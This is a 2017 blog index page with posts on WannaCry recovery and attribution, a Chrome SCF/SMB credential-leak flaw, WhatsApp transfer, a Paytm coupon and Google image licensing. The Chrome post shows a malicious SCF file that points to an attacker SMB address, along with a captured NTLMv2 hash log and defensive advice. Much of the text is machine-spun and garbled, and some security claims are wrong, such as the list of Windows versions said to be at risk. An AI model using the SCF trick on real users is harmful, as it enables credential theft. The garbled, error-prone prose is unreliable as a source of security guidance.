Tricky Spy

HOT

Post Top Ad

Post Top Ad

Saturday, June 3, 2017

WannaCry Ransomware Dead Due To Vulnerable Coding 😂

June 03, 2017 0
A  month ago WannaCry ransomware hit more than 300,000 PCs over the world inside only 72 hours by utilizing its self-spreading abilities to contaminate powerless Windows PCs, especially those utilizing helpless renditions of the OS, inside a similar system.

In any case, that doesn't mean WannaCry was a superb bit of ransomware.

Security analysts have as of late found some programming mistakes in the code of the WannaCrypt ransomware that helps us to recover documents without paying

The Method Which helps to recover only local disk documents. Local Desktop and My documents which are cant recover without decryption key .


Actually after decryption Wannacry malware deletes original files and changed extention to  ".WNCRYT,"


“...the original file will be moved to %TEMP%\%d.WNCRYT (where %d denotes a numeric value). These files contain the original data and are not overwritten,” researchers said.

RECOVER FOR READ - ONLY FILES :



RECOVER SYSTEM DRIVE FILES

Researchers said , The files from Desktop or Documents folder, can not be recovered without the decryption key because WannaCry has been designed to overwrite original files with random data before removal.
We can recover Non- System Files 

RECOVER FILES FROM NON SYSTEM DRIVE




HOPEFUL WORDS AGAINST WANNACRY :


"If you were infected with WannaCry ransomware there is a good possibility that you will be able to restore a lot of the files on the affected computer," Kaspersky Lab wrote in a blog post published Thursday. "The code quality is very low."


"To restore files, you can use the free utilities available for data recovery."

FREE TOOL TO RECOVER INFECTED FILES : 



You Can Download it from here - ➤➤ Wannacry Decryption Tool 

Run it on Affected Computers Using Command Line Tool [ CMD ]
WanaKiwi: WannaCry Ransomware Decryption Tool :





DONT MISS OUR ARTICLES !

                                                       THANKS FOR READING
Read More

Wednesday, May 17, 2017

Mind Your Security On Chrome ! Hackers Stealing Windows Passwords

May 17, 2017 0
A security researcher found a serious vulnerability in google chrome's latest updates which is targeting windows all versions includes windows 10. The Vulnerability allowing hackers to steal your windows login details


Researcher Bosko Stankovic of DefenseCode has found that by just visiting a website containing a malicious SCF file could allow victims to unknowingly share their computer's login credentials with hackers via Chrome and the SMB protocol.

This technique is not new and was exploited by the Stuxnet — a powerful malware that specially designed to destroy Iran's nuclear program — that used the Windows shortcut LNK files to compromise systems.

Chrome + SCF + SMB = Windows Login Credentials Hacked 


Scf -( Shell command File ) - It is with Shortcut extension which works similar to LNK files and is intended to support a restricted set of windows commands that help define an icon on your desktop like my computer and Recycle bin.

The Hacker Just needs to victim has google chrome updated version and visit his site then ready to and apply victim's authentication credentials. Stankovin has written in his Blog post . describing the flaw.

usually , shortcut link on your desktop which has shell code that describes location of icon/thumbnail , applications name and it's location

[shell]
command=2
IconFile=explorer.exe,3

Chrome Trusts Windows SCF Files, The hacker just targeting the file with malicious code . when the victim visit his site , the file automatically gets downloaded without getting confirmation from users

As soon as the user opens the folder , suddenly or later. its get dexecuted without clicking on file. The location of remote SMB server with malicious codes which is controlled by hacker

[shell]
IconFile=\\170.170.170.170/icon

The Malicious file sending login credentials to Hacker

[*] SMB Captured - 2017-05-15 13:10:44 +0200
NTLMv2 Response Captured from 173.203.29.182:62521 - 173.203.29.182
USER:Bosko DOMAIN:Master OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:98daf39c3a253bbe4a289e7a746d4b24
NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e000000000200000000000
00000000000
Bosko::Master:1122334455667788:98daf39c3a253bbe4a289e7a746d4b24:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e00000000020000000000000000000000

The credentials are encrypted but can be "brute-forced" later to retrieve original login password in plain text.

The SCF files which appears extensionless on explorer but the researcher said the file named as picture.jpg.scf and its open on windows explorer as JPG. This type of attacks called as inconspicuous attack with nature of SCF files.


How to Prevent This Remote SMB server Attack :


First block the outbound SMB connections (TCP ports 139 and 445) from the local network to the WAN via firewalls, so that local computers can not query remote SMB servers.

Researcher also advises users to consider disabling automatic downloads in Google Chrome by going to Settings → Show advanced settings → and then Check the "Ask where to save each file before downloading" option.

This method will not allowing hacker to execute his file because automatic downloads are disabled

Google is Aware of this vulnerability they working on it . As soon as the patch will be available.


WannaCry Ransomware ?? - Read Here
Read More

How to Transfer WhatsApp Messages from iPhone to Android

May 17, 2017 0

iPhone users Having trouble to Transfer Messages To Android . i hope the method gonna help you all
The best way to transfer WhatsApp messages from iPhone to Android is via this software

Step 1: Install the Software and Run it in Your Pc - Click Here

Click “WhatsApp Transfer, Backup & Restore” in the middle of the main window, and from the options provided choose “Transfer WhatsApp messages”.







Note: The program will remind you to download or upgrade to the latest version of iTunes so as to smoothly use the transfer function.

Step 2: Connect both your iPhone and Android phone to the computer, the program will identify them automatically.




Note: If you encounter some problems about the connection between your phone and the PC:

1.When your iPhone can’t be recognized:
– Plug your iPhone into other available USB port of the PC.
-Reinstall the latest version of iTunes on the PC.
2.When your Android phone can’t be recognized:
– Plug your Android device into other available USB port of the PC.
– Enable the USB debugging on your Android device,:
Go to Settings > Software information >Tap Built number 7 times in rapid succession and will see the message “You are now a developer!”.
Return back to the last page, go to “Developer options” and turn on “USB debugging”.

Note: If you encounter some problems about the connection between your phone and the PC:
1.When your iPhone can’t be recognized:
– Plug your iPhone into other available USB port of the PC.
-Reinstall the latest version of iTunes on the PC.
2.When your Android phone can’t be recognized:
– Plug your Android device into other available USB port of the PC.
– Enable the USB debugging on your Android device,:
Go to Settings > Software information >Tap Built number 7 times in rapid succession and will see the message “You are now a developer!”.
Return back to the last page, go to “Developer options” and turn on “USB debugging”.


With the help of WhatsApp Transfer, Backup & Restore from FORecovery, moving WhatsApp messages from iPhone to Android is no longer difficult. It won’t cost you much time as well
Thanks For Reading !
Visit Our Site Learn More Techniques
Read More

Tuesday, May 16, 2017

Google Researcher Recovered Strong Connection Between North Korea And WannaCry Attack

May 16, 2017 0

 No Idea About WannaCry Attacks ?


Neel Mehta ,

 Google security researcher , found evidence that suggests the WannaCry ransomware, that infected 300,000 machines in 150 countries over the weekend  for cyber attacks against South Korean organizations.



  • WannaCry ransomware attack which is meant by critical Windows SMB exploit
Neel discovered that the code found in the WannaCry malware .It was identical to the code used in an early 2015 version of Cantopee, a malicious backdoor developed by Lazarus Group,  believed to be linked with state-sponsored hacking group to North Korean government.

Security researchers from Kaspersky LabIntezerSymantec, and Comae Technologies immediately followed the tip from Neel and confirmed a strong link between WannaCry and other malware families, including Lazarus, Joanap, and Brambul, which suggests WannaCry was written or modified by the same author.



Is the WannaCry Attack Over? Or Not ?

Definitely Not , Its Just the beginning

Security researchers have discovered some new variants of this ransomware, which could not be stopped by the kill switch, so you are advised to make sure you have applied the patch for SMB vulnerability and disabled SMBv1 protocol to keep your Windows computers safe from WannaCry and other similar attacks.



The WannaCry attackers declared ransom fees between $300 to $600 to free the hijacked data. The three bitcoin wallets tied to #WannaCry ransomware have received 225 payments totaling 35.98003282 BTC (approx. $60,000) from ransomware victims.


What is WannaCry and How to Escape ??

Read Here 





Read More

How To Escape From WannaCry Ransomware Attack

May 16, 2017 0

What is WannaCry?

A computer virus WannaCry ransomware which is currently spreading across the globe is one of the largest such attacks in some time.On Monday WannaCry Is Very Dangerous Trojan which infects Windows computers and Encrypted all Files. Which is asking 300$ btc to Decrypt datas and after 3 days it increases 300$ to 600$. After a seven days files will be deleted on many systems.



Who is at risk?

WannaCry ransomware is targeting three versions of Windows in particular:
  • Windows 8
  • Windows XP
  • Windows Server 2003
Other Versions Are Nearly Safe.

What should I do if I’m at risk?

If you wanna prevent attack , first install the patches given below for your required versions
Microsoft’s related security bulletin is right here, but you probably don’t even need to bother reading it. Just update. Now.

Is there anything else I can do?


Yes, You can install Good Ransomeware Blocker

I suggest you


Also of note, the security researcher who accidentally slowed the spread of WannaCry over the weekend says that blocking TCP port 445 can help stop the ransomware. You’ll need to Google port-blocking instructions for your specific router if you don’t already know how.



What if I’m already infected?

Sadly, your only options are to pay the ransom or to try Bleeping Computer’s guide to removing WannaCry from your system, though we cannot confirm at this time whether or not it works.
Read More

Friday, May 5, 2017

Get Free Rs 20 Cashback Coupon PayTm

May 05, 2017 0

Get Free Rs 20 Cashback Coupon All Users PayTm



  1. First Download PayTm Mall App: Android IOS
  2. Register or Sign in with Paytm login details.
  3. That’s it for the time being, check your E-Mail for the Promo code.
  4. Now Visit Paytm.com or Download App on your smartphones.
  5. Sign in with Paytm account.
  6. Enter recharge details.
  7. Insert recharge amount as Rs. 50 or more.
  8. Proceed next and Use Promo Code which you have received via email.
  9. That’s it make payment with the preferred payment option. (Debit/credit card, net banking)
  10. Get instant cashback after the successful transaction.



About Offer (Terms and Conditions)
  1. Users need to download and sign into the PayTm Mall App for promo code received on mail to get activated.
  2. Promo code gets activated 48 hours after first sign-in.
  3. Promo code is valid on Mobile recharge transaction (pre-paid or post-paid) of Rs. 50 or more.
  4. Not valid for Airtel recharges.
  5. Cashback received will be credited to your PayTm Wallet.
Read More

Monday, May 1, 2017

How To Find Google Images Without Copyright

May 01, 2017 0
Hi Dears Tricky Spy in the event that you are a blogger or a youtuber and you transfers pictures after pursuit in google and transferring on your blog or your youtube channel then this isn't right on the grounds that these pictures might be copyrighted.And this is turned into a major issue for you since google adsense not permit replicated materials.And on the off chance that somebody announced then google may expel your blog.Now you are suspecting that where we take non duplicate compose pictures so don't stress we have an answer for you with this you van look non copyrighted pictures with google.So simply take after beneath offered ventures to utilize free picture from google with no duplicate compose strike
The Most Effective Method To pursuit Google Pictures Without Copyright 
  • Right off the bat go to google.com and look for any picture 
  • after that you will see a choice name with Setting underneath pursuit bar simply tap on it                                          
  •   after you got numerous alternative simply tap on Advaced Search 
  •  a windows will open after tap on Cutting edge look then tap on " Usage Rights " alternative  in beneath menu 



  • presently in this choice tap on "Not Filtered By License" and after that you see five modes in this simply select "Free o utilize, share or adjust, even monetarily" 
  • presently tap on " Free O Use , Share Or Modify , Even Commercially " then Click Save  That's All Friends.
  • Presently when you scan for pictures in google then google demonstrate just non duplicate compose pictures on their hunt so you can put these pictures on your blog or youtube channel with no dread of duplicate compose strike, 
        Labels:- would you be able to utilize google pictures without copyright,google pictures copyright reasonable use,google pictures copyright filter,google pictures copyright free,google pictures copyright free search,google pictures copyright information,google pictures copyright infrigement,google pictures copyright issues,google pictures copyright laws,google pictures copyright policygoogle pictures copyright rules,google pictures without copyright,how to discover google pictures without copyright,how to discover pictures without copyright on google,how to scan for pictures without copyright on google,how to pursuit google pictures without copyright,how to utilize google pictures without copyright,search google pictures without copyright.
Read More

Post Top Ad